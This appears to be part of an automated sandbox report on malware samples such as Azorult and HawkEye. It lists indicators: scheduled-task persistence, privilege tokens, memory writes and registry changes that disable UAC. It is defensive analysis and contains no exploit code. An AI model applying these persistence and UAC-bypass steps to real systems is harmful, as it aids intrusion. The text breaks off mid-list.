Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage	winit.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	R8.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	wini.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\MIME\Database	winit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage	winit.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\MIME\Database	winit.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	R8.exe

NTFS ADS 3 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 863185.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2	taskhostw.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 802441.crdownload:SmartScreen	msedge.exe

Runs .reg file with regedit 4 IoCs

pid	Process
7116	regedit.exe
4896	regedit.exe
7120	regedit.exe
2960	regedit.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 8 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
10788	schtasks.exe
8260	schtasks.exe
8552	schtasks.exe
10376	schtasks.exe
10496	schtasks.exe
10904	schtasks.exe
4488	schtasks.exe
2948	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1180	msedge.exe
1180	msedge.exe
4616	msedge.exe
4616	msedge.exe
216	identity_helper.exe
216	identity_helper.exe
5596	msedge.exe
5596	msedge.exe
5596	msedge.exe
5596	msedge.exe
5252	msedge.exe
5252	msedge.exe
1788	msedge.exe
1788	msedge.exe
6236	Azorult.exe
6236	Azorult.exe
6236	Azorult.exe
6236	Azorult.exe
6236	Azorult.exe
6236	Azorult.exe
4556	Azorult.exe
4556	Azorult.exe
4556	Azorult.exe
4556	Azorult.exe
4556	Azorult.exe
4556	Azorult.exe
6236	Azorult.exe
4556	Azorult.exe
6236	Azorult.exe
4556	Azorult.exe
6236	Azorult.exe
4556	Azorult.exe
6236	Azorult.exe
4556	Azorult.exe
5372	Azorult.exe
5372	Azorult.exe
5372	Azorult.exe
5372	Azorult.exe
5372	Azorult.exe
5372	Azorult.exe
5372	Azorult.exe
5372	Azorult.exe
5372	Azorult.exe
5372	Azorult.exe
5384	rutserv.exe
5384	rutserv.exe
5384	rutserv.exe
5384	rutserv.exe
5384	rutserv.exe
5384	rutserv.exe
2204	rutserv.exe
2204	rutserv.exe
1052	rutserv.exe
1052	rutserv.exe
3500	rutserv.exe
3500	rutserv.exe
4548	rutserv.exe
4548	rutserv.exe
4548	rutserv.exe
4548	rutserv.exe
4548	rutserv.exe
4548	rutserv.exe
6808	rutserv.exe
6808	rutserv.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
656	Process not Found
656	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs

pid	Process
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
1788	rfusclient.exe

Suspicious use of AdjustPrivilegeToken 13 IoCs

description	pid	Process
Token: SeDebugPrivilege	5384	rutserv.exe
Token: SeDebugPrivilege	3500	rutserv.exe
Token: SeTakeOwnershipPrivilege	4548	rutserv.exe
Token: SeTcbPrivilege	4548	rutserv.exe
Token: SeTcbPrivilege	4548	rutserv.exe
Token: SeDebugPrivilege	6808	rutserv.exe
Token: SeDebugPrivilege	6612	HawkEye.exe
Token: SeDebugPrivilege	5252	taskkill.exe
Token: SeDebugPrivilege	10320	taskkill.exe
Token: SeDebugPrivilege	10172	taskkill.exe
Token: SeDebugPrivilege	7404	taskkill.exe
Token: SeDebugPrivilege	11112	powershell.exe
Token: SeDebugPrivilege	3396	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe
4616	msedge.exe

Suspicious use of SetWindowsHookEx 28 IoCs

pid	Process
4556	Azorult.exe
6236	Azorult.exe
6588	wini.exe
6608	wini.exe
5372	Azorult.exe
5892	winit.exe
3688	winit.exe
5384	rutserv.exe
2204	rutserv.exe
1052	rutserv.exe
4008	cheat.exe
6812	cheat.exe
3500	rutserv.exe
4548	rutserv.exe
6808	rutserv.exe
6948	ink.exe
6852	ink.exe
6352	taskhost.exe
2080	taskhost.exe
1492	P.exe
7036	P.exe
6636	R8.exe
5012	R8.exe
6124	winlogon.exe
8308	winlogon.exe
9244	taskhostw.exe
920	taskhostw.exe
7896	winlogon.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4616 wrote to memory of 2472	4616	msedge.exe	84
PID 4616 wrote to memory of 2472	4616	msedge.exe	84
PID 4616 wrote to memory of 1296	4616	msedge.exe	85
PID 4616 wrote to memory of 1296	4616	msedge.exe	85
PID 4616 wrote to memory of 1296	4616	msedge.exe	85
PID 4616 wrote to memory of 1296	4616	msedge.exe	85
PID 4616 wrote to memory of 1296	4616	msedge.exe	85
PID 4616 wrote to memory of 1296	4616	msedge.exe	85
PID 4616 wrote to memory of 1296	4616	msedge.exe	85
PID 4616 wrote to memory of 1296	4616	msedge.exe	85
PID 4616 wrote to memory of 1296	4616	msedge.exe	85
PID 4616 wrote to memory of 1296	4616	msedge.exe	85
PID 4616 wrote to memory of 1296	4616	msedge.exe	85
PID 4616 wrote to memory of 1296	4616	msedge.exe	85
PID 4616 wrote to memory of 1296	4616	msedge.exe	85
PID 4616 wrote to memory of 1296	4616	msedge.exe	85
PID 4616 wrote to memory of 1296	4616	msedge.exe	85
PID 4616 wrote to memory of 1296	4616	msedge.exe	85
PID 4616 wrote to memory of 1296	4616	msedge.exe	85
PID 4616 wrote to memory of 1296	4616	msedge.exe	85
PID 4616 wrote to memory of 1296	4616	msedge.exe	85
PID 4616 wrote to memory of 1296	4616	msedge.exe	85
PID 4616 wrote to memory of 1296	4616	msedge.exe	85
PID 4616 wrote to memory of 1296	4616	msedge.exe	85
PID 4616 wrote to memory of 1296	4616	msedge.exe	85
PID 4616 wrote to memory of 1296	4616	msedge.exe	85
PID 4616 wrote to memory of 1296	4616	msedge.exe	85
PID 4616 wrote to memory of 1296	4616	msedge.exe	85
PID 4616 wrote to memory of 1296	4616	msedge.exe	85
PID 4616 wrote to memory of 1296	4616	msedge.exe	85
PID 4616 wrote to memory of 1296	4616	msedge.exe	85
PID 4616 wrote to memory of 1296	4616	msedge.exe	85
PID 4616 wrote to memory of 1296	4616	msedge.exe	85
PID 4616 wrote to memory of 1296	4616	msedge.exe	85
PID 4616 wrote to memory of 1296	4616	msedge.exe	85
PID 4616 wrote to memory of 1296	4616	msedge.exe	85
PID 4616 wrote to memory of 1296	4616	msedge.exe	85
PID 4616 wrote to memory of 1296	4616	msedge.exe	85
PID 4616 wrote to memory of 1296	4616	msedge.exe	85
PID 4616 wrote to memory of 1296	4616	msedge.exe	85
PID 4616 wrote to memory of 1296	4616	msedge.exe	85
PID 4616 wrote to memory of 1296	4616	msedge.exe	85
PID 4616 wrote to memory of 1180	4616	msedge.exe	86
PID 4616 wrote to memory of 1180	4616	msedge.exe	86
PID 4616 wrote to memory of 3996	4616	msedge.exe	87
PID 4616 wrote to memory of 3996	4616	msedge.exe	87
PID 4616 wrote to memory of 3996	4616	msedge.exe	87
PID 4616 wrote to memory of 3996	4616	msedge.exe	87
PID 4616 wrote to memory of 3996	4616	msedge.exe	87
PID 4616 wrote to memory of 3996	4616	msedge.exe	87
PID 4616 wrote to memory of 3996	4616	msedge.exe	87
PID 4616 wrote to memory of 3996	4616	msedge.exe	87
PID 4616 wrote to memory of 3996	4616	msedge.exe	87
PID 4616 wrote to memory of 3996	4616	msedge.exe	87
PID 4616 wrote to memory of 3996	4616	msedge.exe	87
PID 4616 wrote to memory of 3996	4616	msedge.exe	87
PID 4616 wrote to memory of 3996	4616	msedge.exe	87
PID 4616 wrote to memory of 3996	4616	msedge.exe	87
PID 4616 wrote to memory of 3996	4616	msedge.exe	87
PID 4616 wrote to memory of 3996	4616	msedge.exe	87
PID 4616 wrote to memory of 3996	4616	msedge.exe	87
PID 4616 wrote to memory of 3996	4616	msedge.exe	87
PID 4616 wrote to memory of 3996	4616	msedge.exe	87
PID 4616 wrote to memory of 3996	4616	msedge.exe	87

System policy modification 1 TTPs 6 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Azorult.exe

Views/modifies file attributes 1 TTPs 9 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
920	attrib.exe
3080	attrib.exe
1444	attrib.exe
5520	attrib.exe
2964	attrib.exe
8328	attrib.exe
7572	attrib.exe
6720	attrib.exe
10816	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://github.com/Da2dalus/The-MALWARE-Repo/blob/master/README.md
1⤵
- Chimera
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4616
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffe56146f8,0x7fffe5614708,0x7fffe5614718
  2⤵
  PID:2472
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2224 /prefetch:2
  2⤵
  PID:1296
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1180
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2864 /prefetch:8
  2⤵
  PID:3996
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
  2⤵
  PID:3640
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3468 /prefetch:1
  2⤵
  PID:2916
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4108 /prefetch:1
  2⤵
  PID:2808
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5384 /prefetch:1
  2⤵
  PID:3524
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5524 /prefetch:1
  2⤵
  PID:3076
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5864 /prefetch:8
  2⤵
  PID:1500
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5864 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:216
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4720 /prefetch:1
  2⤵
  PID:3900
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3848 /prefetch:1
  2⤵
  PID:744
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5516 /prefetch:1
  2⤵
  PID:3872
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:1
  2⤵
  PID:1592
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6088 /prefetch:1
  2⤵
  PID:3556
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:1
  2⤵
  PID:4912
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6024 /prefetch:1
  2⤵
  PID:4732
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1
  2⤵
  PID:4820
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5940 /prefetch:1
  2⤵
  PID:2480
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5084 /prefetch:1
  2⤵
  PID:5464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4084 /prefetch:1
  2⤵
  PID:5744
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1940 /prefetch:1
  2⤵
  PID:5168
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2212 /prefetch:1
  2⤵
  PID:5284
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6288 /prefetch:1
  2⤵
  PID:5240
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6024 /prefetch:1
  2⤵
  PID:5416
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4952 /prefetch:1
  2⤵
  PID:5952
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6440 /prefetch:1
  2⤵
  PID:5936
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5000 /prefetch:1
  2⤵
  PID:2940
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6424 /prefetch:1
  2⤵
  PID:1820
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5632 /prefetch:1
  2⤵
  PID:5660
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6860 /prefetch:1
  2⤵
  PID:5768
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6856 /prefetch:1
  2⤵
  PID:5876
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7304 /prefetch:1
  2⤵
  PID:6060
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7424 /prefetch:1
  2⤵
  PID:5048
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
